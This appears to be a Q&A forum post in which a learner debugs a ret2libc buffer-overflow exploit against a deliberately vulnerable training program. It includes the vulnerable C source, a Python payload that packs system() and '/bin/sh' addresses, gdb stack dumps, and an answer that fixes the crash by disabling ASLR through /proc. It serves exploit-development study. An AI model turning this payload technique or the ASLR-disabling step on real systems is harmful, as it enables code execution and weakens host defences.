# Segmentation Fault ret2libc attack

Tags: segmentation-fault, exploit

i am trying to execute a ret2libc attack.
For this, i need to call the System() from libc and passing the argument "/bin/sh" (address of /bin/sh). Unfortunately I get everytime "Segmentation Fault".

Please can anybody tell me why? If I am looking to the stack, everything looks fine (for me).

This is my Source Code:

```
void getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xbf000000) == 0xbf000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

  printf("got path %s\n", buffer);
}

int main(int argc, char **argv)
{
  getpath();
}
```

My exploit code is as follows:

```
    import struct
    offset = "A"*88
    system_adress = struct.pack("q",0x7ffff7a60510)
    nop = "\x90"*4
    bin_sh_adress = struct.pack("q",0x7ffff7b9b3f3)

    #libc_start = 0x7ffff7a1e000
    #sh_offset = 0x17d3f3
    #libc_start plus sh_Offset = 0x7ffff7b9b3f3

    print(offset + system_adress + nop + bin_sh_adress)

In the following my terminal commands:

>>> r < ./text
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/Desktop/ExerciseExploit/stack6 < ./text

Breakpoint 2, getpath () at stack6.c:11
11    printf("input path please: "); fflush(stdout);
>>> i r rsp rbp
rsp            0x7fffffffe160   0x7fffffffe160
rbp            0x7fffffffe1b0   0x7fffffffe1b0
>>> x/40xw $rsp
0x7fffffffe160: 0x00000000  0x00000000  0x00f0b2ff  0x00000000
0x7fffffffe170: 0x000000c2  0x00000000  0xffffe1a6  0x00007fff
0x7fffffffe180: 0x00000001  0x00000000  0xf7abe905  0x00007fff
0x7fffffffe190: 0x00000001  0x00000000  0x5555485d  0x00005555
0x7fffffffe1a0: 0xf7de70e0  0x00007fff  0x00000000  0x00000000
0x7fffffffe1b0: 0xffffe1d0  0x00007fff  0x555547fd  0x00005555
0x7fffffffe1c0: 0xffffe2b8  0x00007fff  0x00000000  0x00000001
0x7fffffffe1d0: 0x55554810  0x00005555  0xf7a3fa87  0x00007fff
0x7fffffffe1e0: 0x00000000  0x00000000  0xffffe2b8  0x00007fff
0x7fffffffe1f0: 0x00040000  0x00000001  0x555547e4  0x00005555
>>> n
input path please: 13     gets(buffer);
>>> n

Breakpoint 1, getpath () at stack6.c:15
15    ret = __builtin_return_address(0);
>>> i r rsp rbp
rsp            0x7fffffffe160   0x7fffffffe160
rbp            0x7fffffffe1b0   0x7fffffffe1b0
>>> x/40xw $rsp
0x7fffffffe160: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe170: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe180: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe190: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe1a0: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe1b0: 0x41414141  0x41414141  0xf7a60510  0x00007fff
0x7fffffffe1c0: 0x90909090  0xf7b9b3f3  0x00007fff  0x00000000
0x7fffffffe1d0: 0x55554810  0x00005555  0xf7a3fa87  0x00007fff
0x7fffffffe1e0: 0x00000000  0x00000000  0xffffe2b8  0x00007fff
0x7fffffffe1f0: 0x00040000  0x00000001  0x555547e4  0x00005555
>>> n
17    if((ret & 0xbf000000) == 0xbf000000) {
>>> n
22    printf("got path %s\n", buffer);
>>>
```

Error report:

```
root@kali:~/Desktop/ExerciseExploit# python exploit6.py | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAA���
Segmentation fault
```

Comment: In your comment on the answer by @0x4D it sounds like you might have solved your problem. If so, we encourage you to answer your own question to help future people with the same problem.

Answer (score 0, accepted):

[closed]

Problem fixed:

**ASLR was not disabled**
-> Disabling ASLR: echo 0 > /proc/sys/kernel/randomize_va_space